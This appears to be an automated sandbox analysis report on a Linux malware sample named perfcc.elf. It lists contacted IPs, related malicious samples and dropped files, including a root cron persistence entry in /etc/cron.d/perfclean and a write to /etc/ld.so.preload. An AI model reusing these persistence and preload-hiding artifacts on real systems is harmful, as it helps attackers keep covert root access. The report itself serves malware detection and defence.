https://trac.torproject.org/projects/tor/ticket/14917.	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Mirai	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Order Specifications for Materials.docx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	104.26.12.205
	Documents.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Dan's sus QR code.png	Get hash	malicious	Unknown	Browse	104.26.13.205
	https://premierbb.sharefile.com/public/share/web-189361297164461c	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.13.205
	2JHGWjmJ46.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	kNyZqDECXJ.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	IT3rIaXTLZ.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	78nah2nPON.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
CANONICAL-ASGB	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
CLOUDFLARENETUS	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	172.67.181.150
	https://trendydigitalbuzze.com.de/YrWXF/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://uk01.l.antigena.com/l/gSyI41Gz96sNln53sagX7eNcywQQOoEnYDagSj-Ka4rmvUc~~ge2uUdYhkRZf~qdeCYR20MfqPF0Cl22iQAPA~D-kwryf6JMugP38-hVRau_ADDrbJG64mdp-ZsyZX_NR5Aqy8QOMomREd_j~F2RHekIK09DCim8Shqfhw4hZXnXF1DPP7U2UTL09nH60jVmeQTVNhtpj6BYLNdVUlIVUBIDlYaiNtMQkkHjcq1woyuQdpbGd~TSAUV	Get hash	malicious	Unknown	Browse	104.16.119.9
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://na4.docusign.net/Signing/EmailStart.aspx?a=b4cf6218-13ec-46d9-aa5c-10723ebe7e7f&etti=24&acct=d9c705c1-5012-4d8b-98f5-b9c62798fde2&er=efa4815b-08b1-4fe7-b32f-ac28ff7e2554	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Order Specifications for Materials.docx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://growthsparkplus.thsite.top/?email=anna@cellnextelecom.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	MFSA-MiFID-APS-P2_20241007-Annex2_DOC-R-v1.1.exe	Get hash	malicious	Unknown	Browse	172.67.158.46
	https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/iyada.txt	Get hash	malicious	Unknown	Browse	162.159.140.237
INIT7CH	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Mirai	Browse	109.202.202.202

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file
Preview:

/dev/shm/.dmesg/ino/74797

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file
Preview:

/dev/shm/.dmesg/pds/6269

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file
Preview:

/dev/shm/.dmesg/pds/6311

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file
Preview:

/dev/shm/.dmesg/pds/6374

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file
Preview:

/dev/shm/.dmesg/pds/6375

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6379

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6380

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6429

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6434

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6472

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6491

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6517

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6555

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6620

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6630

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6631

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6632

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6633

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6634

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6635

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6670

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6671

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6684

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6689

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6690

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6693

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6702

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6705

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6711

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6713

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6714

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/dev/shm/.dmesg/pds/6721

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

/etc/cron.d/perfclean

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.1180782093497093
Encrypted:	false
SSDEEP:	3:03P1tKeqKGvn:03Kee
MD5:	AC908752CE1156AB54E1B932E894D297
SHA1:	0489510CD652CAA57F2FEF5146CEE8D846D80961
SHA-256:	2F8CBAD2415DC9BAF6F5520F74F0144C7CB26CE3B65C8A40E603908734FBD638
SHA-512:	3B0A77D2A5E716D8F1BD3062C51E1434E80C4BF14E4BC40129188C89C9877B6D90A1D9A677D03C705EFEC5AA120BD25C612BB9E6E1E2B976E63830D3B795847D
Malicious:	true
Preview:	9 * * * * root perfcc.

/etc/ld.so.preload

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.6168746059562227
Encrypted:	false
SSDEEP:	3:/qJpK:/qJpK
MD5:	3403C2384B6F5E625511BEFB81FBFA01
